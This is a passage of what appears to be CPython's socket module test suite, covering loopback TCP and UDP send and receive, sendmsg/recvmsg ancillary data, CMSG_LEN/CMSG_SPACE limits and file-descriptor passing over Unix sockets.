read = self.cli_conn.recv(1024)
if not read:
break
msg += read
self.assertEqual(msg, b'f' * 2048)
def _testSendAll(self):
big_chunk = b'f' * 2048
self.serv_conn.sendall(big_chunk)
def testFromFd(self):
# Testing fromfd()
fd = self.cli_conn.fileno()
sock = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
self.assertIsInstance(sock, socket.socket)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testFromFd(self):
self.serv_conn.send(MSG)
def testDup(self):
# Testing dup()
sock = self.cli_conn.dup()
self.addCleanup(sock.close)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testDup(self):
self.serv_conn.send(MSG)
def testShutdown(self):
# Testing shutdown()
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, MSG)
# wait for _testShutdown to finish: on OS X, when the server
# closes the connection the client also becomes disconnected,
# and the client's shutdown call will fail. (Issue #4397.)
self.done.wait()
def _testShutdown(self):
self.serv_conn.send(MSG)
self.serv_conn.shutdown(2)
testShutdown_overflow = support.cpython_only(testShutdown)
@support.cpython_only
def _testShutdown_overflow(self):
import _testcapi
self.serv_conn.send(MSG)
# Issue 15989
self.assertRaises(OverflowError, self.serv_conn.shutdown,
_testcapi.INT_MAX + 1)
self.assertRaises(OverflowError, self.serv_conn.shutdown,
2 + (_testcapi.UINT_MAX + 1))
self.serv_conn.shutdown(2)
def testDetach(self):
# Testing detach()
fileno = self.cli_conn.fileno()
f = self.cli_conn.detach()
self.assertEqual(f, fileno)
# cli_conn cannot be used anymore...
self.assertTrue(self.cli_conn._closed)
self.assertRaises(OSError, self.cli_conn.recv, 1024)
self.cli_conn.close()
# ...but we can create another socket using the (still open)
# file descriptor
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=f)
self.addCleanup(sock.close)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testDetach(self):
self.serv_conn.send(MSG)
class BasicUDPTest(ThreadedUDPSocketTest):
def __init__(self, methodName='runTest'):
ThreadedUDPSocketTest.__init__(self, methodName=methodName)
def testSendtoAndRecv(self):
# Testing sendto() and Recv() over UDP
msg = self.serv.recv(len(MSG))
self.assertEqual(msg, MSG)
def _testSendtoAndRecv(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
def testRecvFrom(self):
# Testing recvfrom() over UDP
msg, addr = self.serv.recvfrom(len(MSG))
self.assertEqual(msg, MSG)
def _testRecvFrom(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
def testRecvFromNegative(self):
# Negative lengths passed to recvfrom should give ValueError.
self.assertRaises(ValueError, self.serv.recvfrom, -1)
def _testRecvFromNegative(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
class BasicUDPLITETest(ThreadedUDPLITESocketTest):
def __init__(self, methodName='runTest'):
ThreadedUDPLITESocketTest.__init__(self, methodName=methodName)
def testSendtoAndRecv(self):
        # Testing sendto() and recv() over UDPLITE
msg = self.serv.recv(len(MSG))
self.assertEqual(msg, MSG)
def _testSendtoAndRecv(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
def testRecvFrom(self):
# Testing recvfrom() over UDPLITE
msg, addr = self.serv.recvfrom(len(MSG))
self.assertEqual(msg, MSG)
def _testRecvFrom(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
def testRecvFromNegative(self):
# Negative lengths passed to recvfrom should give ValueError.
self.assertRaises(ValueError, self.serv.recvfrom, -1)
def _testRecvFromNegative(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
# Tests for the sendmsg()/recvmsg() interface. Where possible, the
# same test code is used with different families and types of socket
# (e.g. stream, datagram), and tests using recvmsg() are repeated
# using recvmsg_into().
#
# The generic test classes such as SendmsgTests and
# RecvmsgGenericTests inherit from SendrecvmsgBase and expect to be
# supplied with sockets cli_sock and serv_sock representing the
# client's and the server's end of the connection respectively, and
# attributes cli_addr and serv_addr holding their (numeric where
# appropriate) addresses.
#
# The final concrete test classes combine these with subclasses of
# SocketTestBase which set up client and server sockets of a specific
# type, and with subclasses of SendrecvmsgBase such as
# SendrecvmsgDgramBase and SendrecvmsgConnectedBase which map these
# sockets to cli_sock and serv_sock and override the methods and
# attributes of SendrecvmsgBase to fill in destination addresses if
# needed when sending, check for specific flags in msg_flags, etc.
#
# RecvmsgIntoMixin provides a version of doRecvmsg() implemented using
# recvmsg_into().
# XXX: like the other datagram (UDP) tests in this module, the code
# here assumes that datagram delivery on the local machine will be
# reliable.
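# As a rough illustration of the composition described above (the real
# definitions appear further down in this module), a concrete test class is
# assembled roughly like this:
#
#     class RecvmsgUDPTest(RecvmsgTests, SendrecvmsgUDPTestBase):
#         pass
#
# where RecvmsgTests supplies the generic recvmsg() checks and
# SendrecvmsgUDPTestBase binds a threaded pair of UDP sockets to cli_sock
# and serv_sock.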
class SendrecvmsgBase(ThreadSafeCleanupTestCase):
# Base class for sendmsg()/recvmsg() tests.
# Time in seconds to wait before considering a test failed, or
# None for no timeout. Not all tests actually set a timeout.
fail_timeout = support.LOOPBACK_TIMEOUT
def setUp(self):
self.misc_event = threading.Event()
super().setUp()
def sendToServer(self, msg):
# Send msg to the server.
return self.cli_sock.send(msg)
# Tuple of alternative default arguments for sendmsg() when called
# via sendmsgToServer() (e.g. to include a destination address).
sendmsg_to_server_defaults = ()
def sendmsgToServer(self, *args):
# Call sendmsg() on self.cli_sock with the given arguments,
# filling in any arguments which are not supplied with the
# corresponding items of self.sendmsg_to_server_defaults, if
# any.
return self.cli_sock.sendmsg(
*(args + self.sendmsg_to_server_defaults[len(args):]))
def doRecvmsg(self, sock, bufsize, *args):
# Call recvmsg() on sock with given arguments and return its
# result. Should be used for tests which can use either
# recvmsg() or recvmsg_into() - RecvmsgIntoMixin overrides
# this method with one which emulates it using recvmsg_into(),
# thus allowing the same test to be used for both methods.
result = sock.recvmsg(bufsize, *args)
self.registerRecvmsgResult(result)
return result
def registerRecvmsgResult(self, result):
# Called by doRecvmsg() with the return value of recvmsg() or
# recvmsg_into(). Can be overridden to arrange cleanup based
# on the returned ancillary data, for instance.
pass
def checkRecvmsgAddress(self, addr1, addr2):
# Called to compare the received address with the address of
# the peer.
self.assertEqual(addr1, addr2)
# Flags that are normally unset in msg_flags
msg_flags_common_unset = 0
for name in ("MSG_CTRUNC", "MSG_OOB"):
msg_flags_common_unset |= getattr(socket, name, 0)
# Flags that are normally set
msg_flags_common_set = 0
# Flags set when a complete record has been received (e.g. MSG_EOR
# for SCTP)
msg_flags_eor_indicator = 0
# Flags set when a complete record has not been received
# (e.g. MSG_TRUNC for datagram sockets)
msg_flags_non_eor_indicator = 0
def checkFlags(self, flags, eor=None, checkset=0, checkunset=0, ignore=0):
# Method to check the value of msg_flags returned by recvmsg[_into]().
#
# Checks that all bits in msg_flags_common_set attribute are
# set in "flags" and all bits in msg_flags_common_unset are
# unset.
#
# The "eor" argument specifies whether the flags should
# indicate that a full record (or datagram) has been received.
# If "eor" is None, no checks are done; otherwise, checks
# that:
#
# * if "eor" is true, all bits in msg_flags_eor_indicator are
# set and all bits in msg_flags_non_eor_indicator are unset
#
# * if "eor" is false, all bits in msg_flags_non_eor_indicator
# are set and all bits in msg_flags_eor_indicator are unset
#
# If "checkset" and/or "checkunset" are supplied, they require
# the given bits to be set or unset respectively, overriding
# what the attributes require for those bits.
#
# If any bits are set in "ignore", they will not be checked,
# regardless of the other inputs.
#
# Will raise Exception if the inputs require a bit to be both
# set and unset, and it is not ignored.
defaultset = self.msg_flags_common_set
defaultunset = self.msg_flags_common_unset
if eor:
defaultset |= self.msg_flags_eor_indicator
defaultunset |= self.msg_flags_non_eor_indicator
elif eor is not None:
defaultset |= self.msg_flags_non_eor_indicator
defaultunset |= self.msg_flags_eor_indicator
# Function arguments override defaults
defaultset &= ~checkunset
defaultunset &= ~checkset
# Merge arguments with remaining defaults, and check for conflicts
checkset |= defaultset
checkunset |= defaultunset
inboth = checkset & checkunset & ~ignore
if inboth:
raise Exception("contradictory set, unset requirements for flags "
"{0:#x}".format(inboth))
# Compare with given msg_flags value
mask = (checkset | checkunset) & ~ignore
self.assertEqual(flags & mask, checkset & mask)
class RecvmsgIntoMixin(SendrecvmsgBase):
# Mixin to implement doRecvmsg() using recvmsg_into().
def doRecvmsg(self, sock, bufsize, *args):
buf = bytearray(bufsize)
result = sock.recvmsg_into([buf], *args)
self.registerRecvmsgResult(result)
self.assertGreaterEqual(result[0], 0)
self.assertLessEqual(result[0], bufsize)
return (bytes(buf[:result[0]]),) + result[1:]
class SendrecvmsgDgramFlagsBase(SendrecvmsgBase):
# Defines flags to be checked in msg_flags for datagram sockets.
@property
def msg_flags_non_eor_indicator(self):
return super().msg_flags_non_eor_indicator | socket.MSG_TRUNC
class SendrecvmsgSCTPFlagsBase(SendrecvmsgBase):
# Defines flags to be checked in msg_flags for SCTP sockets.
@property
def msg_flags_eor_indicator(self):
return super().msg_flags_eor_indicator | socket.MSG_EOR
class SendrecvmsgConnectionlessBase(SendrecvmsgBase):
# Base class for tests on connectionless-mode sockets. Users must
# supply sockets on attributes cli and serv to be mapped to
# cli_sock and serv_sock respectively.
@property
def serv_sock(self):
return self.serv
@property
def cli_sock(self):
return self.cli
@property
def sendmsg_to_server_defaults(self):
return ([], [], 0, self.serv_addr)
def sendToServer(self, msg):
return self.cli_sock.sendto(msg, self.serv_addr)
class SendrecvmsgConnectedBase(SendrecvmsgBase):
# Base class for tests on connected sockets. Users must supply
# sockets on attributes serv_conn and cli_conn (representing the
# connections *to* the server and the client), to be mapped to
# cli_sock and serv_sock respectively.
@property
def serv_sock(self):
return self.cli_conn
@property
def cli_sock(self):
return self.serv_conn
def checkRecvmsgAddress(self, addr1, addr2):
# Address is currently "unspecified" for a connected socket,
# so we don't examine it
pass
class SendrecvmsgServerTimeoutBase(SendrecvmsgBase):
# Base class to set a timeout on server's socket.
def setUp(self):
super().setUp()
self.serv_sock.settimeout(self.fail_timeout)
class SendmsgTests(SendrecvmsgServerTimeoutBase):
# Tests for sendmsg() which can use any socket type and do not
# involve recvmsg() or recvmsg_into().
def testSendmsg(self):
# Send a simple message with sendmsg().
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsg(self):
self.assertEqual(self.sendmsgToServer([MSG]), len(MSG))
def testSendmsgDataGenerator(self):
        # Send from a buffer obtained from a generator (not a sequence).
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgDataGenerator(self):
self.assertEqual(self.sendmsgToServer((o for o in [MSG])),
len(MSG))
def testSendmsgAncillaryGenerator(self):
# Gather (empty) ancillary data from a generator.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgAncillaryGenerator(self):
self.assertEqual(self.sendmsgToServer([MSG], (o for o in [])),
len(MSG))
def testSendmsgArray(self):
# Send data from an array instead of the usual bytes object.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgArray(self):
self.assertEqual(self.sendmsgToServer([array.array("B", MSG)]),
len(MSG))
def testSendmsgGather(self):
# Send message data from more than one buffer (gather write).
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgGather(self):
self.assertEqual(self.sendmsgToServer([MSG[:3], MSG[3:]]), len(MSG))
def testSendmsgBadArgs(self):
# Check that sendmsg() rejects invalid arguments.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgBadArgs(self):
self.assertRaises(TypeError, self.cli_sock.sendmsg)
self.assertRaises(TypeError, self.sendmsgToServer,
b"not in an iterable")
self.assertRaises(TypeError, self.sendmsgToServer,
object())
self.assertRaises(TypeError, self.sendmsgToServer,
[object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG, object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], object())
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [], object())
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [], 0, object())
self.sendToServer(b"done")
def testSendmsgBadCmsg(self):
# Check that invalid ancillary data items are rejected.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgBadCmsg(self):
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(object(), 0, b"data")])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, object(), b"data")])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, object())])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0)])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, b"data", 42)])
self.sendToServer(b"done")
@requireAttrs(socket, "CMSG_SPACE")
def testSendmsgBadMultiCmsg(self):
# Check that invalid ancillary data items are rejected when
# more than one item is present.
self.assertEqual(self.serv_sock.recv(1000), b"done")
@testSendmsgBadMultiCmsg.client_skip
def _testSendmsgBadMultiCmsg(self):
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [0, 0, b""])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, b""), object()])
self.sendToServer(b"done")
def testSendmsgExcessCmsgReject(self):
# Check that sendmsg() rejects excess ancillary data items
# when the number that can be sent is limited.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgExcessCmsgReject(self):
if not hasattr(socket, "CMSG_SPACE"):
# Can only send one item
with self.assertRaises(OSError) as cm:
self.sendmsgToServer([MSG], [(0, 0, b""), (0, 0, b"")])
self.assertIsNone(cm.exception.errno)
self.sendToServer(b"done")
def testSendmsgAfterClose(self):
# Check that sendmsg() fails on a closed socket.
pass
def _testSendmsgAfterClose(self):
self.cli_sock.close()
self.assertRaises(OSError, self.sendmsgToServer, [MSG])
class SendmsgStreamTests(SendmsgTests):
# Tests for sendmsg() which require a stream socket and do not
# involve recvmsg() or recvmsg_into().
def testSendmsgExplicitNoneAddr(self):
# Check that peer address can be specified as None.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgExplicitNoneAddr(self):
self.assertEqual(self.sendmsgToServer([MSG], [], 0, None), len(MSG))
def testSendmsgTimeout(self):
# Check that timeout works with sendmsg().
self.assertEqual(self.serv_sock.recv(512), b"a"*512)
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
def _testSendmsgTimeout(self):
try:
self.cli_sock.settimeout(0.03)
try:
while True:
self.sendmsgToServer([b"a"*512])
except TimeoutError:
pass
except OSError as exc:
if exc.errno != errno.ENOMEM:
raise
# bpo-33937 the test randomly fails on Travis CI with
# "OSError: [Errno 12] Cannot allocate memory"
else:
self.fail("TimeoutError not raised")
finally:
self.misc_event.set()
    # XXX: it would be nice to have more tests for the sendmsg() flags
    # argument. Linux supports MSG_DONTWAIT when sending, but in general it
    # only works when receiving. Other platforms could be added if they
    # support it too.
@skipWithClientIf(sys.platform not in {"linux"},
"MSG_DONTWAIT not known to work on this platform when "
"sending")
def testSendmsgDontWait(self):
# Check that MSG_DONTWAIT in flags causes non-blocking behaviour.
self.assertEqual(self.serv_sock.recv(512), b"a"*512)
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
@testSendmsgDontWait.client_skip
def _testSendmsgDontWait(self):
try:
with self.assertRaises(OSError) as cm:
while True:
self.sendmsgToServer([b"a"*512], [], socket.MSG_DONTWAIT)
# bpo-33937: catch also ENOMEM, the test randomly fails on Travis CI
# with "OSError: [Errno 12] Cannot allocate memory"
self.assertIn(cm.exception.errno,
(errno.EAGAIN, errno.EWOULDBLOCK, errno.ENOMEM))
finally:
self.misc_event.set()
class SendmsgConnectionlessTests(SendmsgTests):
# Tests for sendmsg() which require a connectionless-mode
# (e.g. datagram) socket, and do not involve recvmsg() or
# recvmsg_into().
def testSendmsgNoDestAddr(self):
# Check that sendmsg() fails when no destination address is
# given for unconnected socket.
pass
def _testSendmsgNoDestAddr(self):
self.assertRaises(OSError, self.cli_sock.sendmsg,
[MSG])
self.assertRaises(OSError, self.cli_sock.sendmsg,
[MSG], [], 0, None)
class RecvmsgGenericTests(SendrecvmsgBase):
# Tests for recvmsg() which can also be emulated using
# recvmsg_into(), and can use any socket type.
def testRecvmsg(self):
# Receive a simple message with recvmsg[_into]().
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsg(self):
self.sendToServer(MSG)
def testRecvmsgExplicitDefaults(self):
# Test recvmsg[_into]() with default arguments provided explicitly.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 0, 0)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgExplicitDefaults(self):
self.sendToServer(MSG)
def testRecvmsgShorter(self):
        # Receive a message smaller than the buffer.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) + 42)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgShorter(self):
self.sendToServer(MSG)
def testRecvmsgTrunc(self):
# Receive part of message, check for truncation indicators.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3)
self.assertEqual(msg, MSG[:-3])
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=False)
def _testRecvmsgTrunc(self):
self.sendToServer(MSG)
def testRecvmsgShortAncillaryBuf(self):
# Test ancillary data buffer too small to hold any ancillary data.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgShortAncillaryBuf(self):
self.sendToServer(MSG)
def testRecvmsgLongAncillaryBuf(self):
# Test large ancillary data buffer.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgLongAncillaryBuf(self):
self.sendToServer(MSG)
def testRecvmsgAfterClose(self):
# Check that recvmsg[_into]() fails on a closed socket.
self.serv_sock.close()
self.assertRaises(OSError, self.doRecvmsg, self.serv_sock, 1024)
def _testRecvmsgAfterClose(self):
pass
def testRecvmsgTimeout(self):
# Check that timeout works.
try:
self.serv_sock.settimeout(0.03)
self.assertRaises(TimeoutError,
self.doRecvmsg, self.serv_sock, len(MSG))
finally:
self.misc_event.set()
def _testRecvmsgTimeout(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
@requireAttrs(socket, "MSG_PEEK")
def testRecvmsgPeek(self):
# Check that MSG_PEEK in flags enables examination of pending
# data without consuming it.
# Receive part of data with MSG_PEEK.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3, 0,
socket.MSG_PEEK)
self.assertEqual(msg, MSG[:-3])
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
# Ignoring MSG_TRUNC here (so this test is the same for stream
# and datagram sockets). Some wording in POSIX seems to
# suggest that it needn't be set when peeking, but that may
# just be a slip.
self.checkFlags(flags, eor=False,
ignore=getattr(socket, "MSG_TRUNC", 0))
# Receive all data with MSG_PEEK.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 0,
socket.MSG_PEEK)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
# Check that the same data can still be received normally.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
@testRecvmsgPeek.client_skip
def _testRecvmsgPeek(self):
self.sendToServer(MSG)
@requireAttrs(socket.socket, "sendmsg")
def testRecvmsgFromSendmsg(self):
# Test receiving with recvmsg[_into]() when message is sent
# using sendmsg().
self.serv_sock.settimeout(self.fail_timeout)
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
@testRecvmsgFromSendmsg.client_skip
def _testRecvmsgFromSendmsg(self):
self.assertEqual(self.sendmsgToServer([MSG[:3], MSG[3:]]), len(MSG))
class RecvmsgGenericStreamTests(RecvmsgGenericTests):
# Tests which require a stream socket and can use either recvmsg()
# or recvmsg_into().
def testRecvmsgEOF(self):
# Receive end-of-stream indicator (b"", peer socket closed).
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, 1024)
self.assertEqual(msg, b"")
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=None) # Might not have end-of-record marker
def _testRecvmsgEOF(self):
self.cli_sock.close()
def testRecvmsgOverflow(self):
# Receive a message in more than one chunk.
seg1, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=False)
seg2, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, 1024)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testRecvmsgOverflow(self):
self.sendToServer(MSG)
class RecvmsgTests(RecvmsgGenericTests):
# Tests for recvmsg() which can use any socket type.
def testRecvmsgBadArgs(self):
# Check that recvmsg() rejects invalid arguments.
self.assertRaises(TypeError, self.serv_sock.recvmsg)
self.assertRaises(ValueError, self.serv_sock.recvmsg,
-1, 0, 0)
self.assertRaises(ValueError, self.serv_sock.recvmsg,
len(MSG), -1, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
[bytearray(10)], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
object(), 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
len(MSG), object(), 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
len(MSG), 0, object())
msg, ancdata, flags, addr = self.serv_sock.recvmsg(len(MSG), 0, 0)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgBadArgs(self):
self.sendToServer(MSG)
class RecvmsgIntoTests(RecvmsgIntoMixin, RecvmsgGenericTests):
# Tests for recvmsg_into() which can use any socket type.
def testRecvmsgIntoBadArgs(self):
# Check that recvmsg_into() rejects invalid arguments.
buf = bytearray(len(MSG))
self.assertRaises(TypeError, self.serv_sock.recvmsg_into)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
len(MSG), 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
buf, 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[object()], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[b"I'm not writable"], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf, object()], 0, 0)
self.assertRaises(ValueError, self.serv_sock.recvmsg_into,
[buf], -1, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf], object(), 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf], 0, object())
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into([buf], 0, 0)
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf, bytearray(MSG))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoBadArgs(self):
self.sendToServer(MSG)
def testRecvmsgIntoGenerator(self):
        # Receive into a buffer obtained from a generator (not a sequence).
buf = bytearray(len(MSG))
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into(
(o for o in [buf]))
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf, bytearray(MSG))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoGenerator(self):
self.sendToServer(MSG)
def testRecvmsgIntoArray(self):
# Receive into an array rather than the usual bytearray.
buf = array.array("B", [0] * len(MSG))
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into([buf])
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf.tobytes(), MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoArray(self):
self.sendToServer(MSG)
def testRecvmsgIntoScatter(self):
        # Receive into multiple buffers (scatter read).
b1 = bytearray(b"----")
b2 = bytearray(b"0123456789")
b3 = bytearray(b"--------------")
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into(
[b1, memoryview(b2)[2:9], b3])
self.assertEqual(nbytes, len(b"Mary had a little lamb"))
self.assertEqual(b1, bytearray(b"Mary"))
self.assertEqual(b2, bytearray(b"01 had a 9"))
self.assertEqual(b3, bytearray(b"little lamb---"))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoScatter(self):
self.sendToServer(b"Mary had a little lamb")
class CmsgMacroTests(unittest.TestCase):
# Test the functions CMSG_LEN() and CMSG_SPACE(). Tests
# assumptions used by sendmsg() and recvmsg[_into](), which share
# code with these functions.
# Match the definition in socketmodule.c
try:
import _testcapi
except ImportError:
socklen_t_limit = 0x7fffffff
else:
socklen_t_limit = min(0x7fffffff, _testcapi.INT_MAX)
@requireAttrs(socket, "CMSG_LEN")
def testCMSG_LEN(self):
# Test CMSG_LEN() with various valid and invalid values,
# checking the assumptions used by recvmsg() and sendmsg().
toobig = self.socklen_t_limit - socket.CMSG_LEN(0) + 1
values = list(range(257)) + list(range(toobig - 257, toobig))
# struct cmsghdr has at least three members, two of which are ints
self.assertGreater(socket.CMSG_LEN(0), array.array("i").itemsize * 2)
for n in values:
ret = socket.CMSG_LEN(n)
# This is how recvmsg() calculates the data size
self.assertEqual(ret - socket.CMSG_LEN(0), n)
self.assertLessEqual(ret, self.socklen_t_limit)
self.assertRaises(OverflowError, socket.CMSG_LEN, -1)
# sendmsg() shares code with these functions, and requires
# that it reject values over the limit.
self.assertRaises(OverflowError, socket.CMSG_LEN, toobig)
self.assertRaises(OverflowError, socket.CMSG_LEN, sys.maxsize)
@requireAttrs(socket, "CMSG_SPACE")
def testCMSG_SPACE(self):
# Test CMSG_SPACE() with various valid and invalid values,
# checking the assumptions used by sendmsg().
toobig = self.socklen_t_limit - socket.CMSG_SPACE(1) + 1
values = list(range(257)) + list(range(toobig - 257, toobig))
last = socket.CMSG_SPACE(0)
# struct cmsghdr has at least three members, two of which are ints
self.assertGreater(last, array.array("i").itemsize * 2)
for n in values:
ret = socket.CMSG_SPACE(n)
self.assertGreaterEqual(ret, last)
self.assertGreaterEqual(ret, socket.CMSG_LEN(n))
self.assertGreaterEqual(ret, n + socket.CMSG_LEN(0))
self.assertLessEqual(ret, self.socklen_t_limit)
last = ret
self.assertRaises(OverflowError, socket.CMSG_SPACE, -1)
# sendmsg() shares code with these functions, and requires
# that it reject values over the limit.
self.assertRaises(OverflowError, socket.CMSG_SPACE, toobig)
self.assertRaises(OverflowError, socket.CMSG_SPACE, sys.maxsize)
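# Illustrative helper (defined for reference only; nothing in this module
# calls it). The relationship exercised by CmsgMacroTests is the one
# applications rely on when sizing ancillary buffers: CMSG_LEN(n) is the
# exact length of a single control message carrying n bytes of data, while
# CMSG_SPACE(n) also reserves trailing padding and is therefore what
# recvmsg() callers normally pass. The sketch assumes a platform that
# provides both macros.
def _example_scm_rights_bufsize(numfds):
    # Ancillary buffer size for receiving numfds descriptors in one
    # SCM_RIGHTS control message (each descriptor is one C int).
    return socket.CMSG_SPACE(numfds * SIZEOF_INT)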
class SCMRightsTest(SendrecvmsgServerTimeoutBase):
# Tests for file descriptor passing on Unix-domain sockets.
# Invalid file descriptor value that's unlikely to evaluate to a
# real FD even if one of its bytes is replaced with a different
# value (which shouldn't actually happen).
badfd = -0x5555
def newFDs(self, n):
# Return a list of n file descriptors for newly-created files
# containing their list indices as ASCII numbers.
fds = []
for i in range(n):
fd, path = tempfile.mkstemp()
self.addCleanup(os.unlink, path)
self.addCleanup(os.close, fd)
os.write(fd, str(i).encode())
fds.append(fd)
return fds
def checkFDs(self, fds):
# Check that the file descriptors in the given list contain
# their correct list indices as ASCII numbers.
for n, fd in enumerate(fds):
os.lseek(fd, 0, os.SEEK_SET)
self.assertEqual(os.read(fd, 1024), str(n).encode())
def registerRecvmsgResult(self, result):
self.addCleanup(self.closeRecvmsgFDs, result)
def closeRecvmsgFDs(self, recvmsg_result):
# Close all file descriptors specified in the ancillary data
# of the given return value from recvmsg() or recvmsg_into().
for cmsg_level, cmsg_type, cmsg_data in recvmsg_result[1]:
if (cmsg_level == socket.SOL_SOCKET and
cmsg_type == socket.SCM_RIGHTS):
fds = array.array("i")
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
for fd in fds:
os.close(fd)
def createAndSendFDs(self, n):
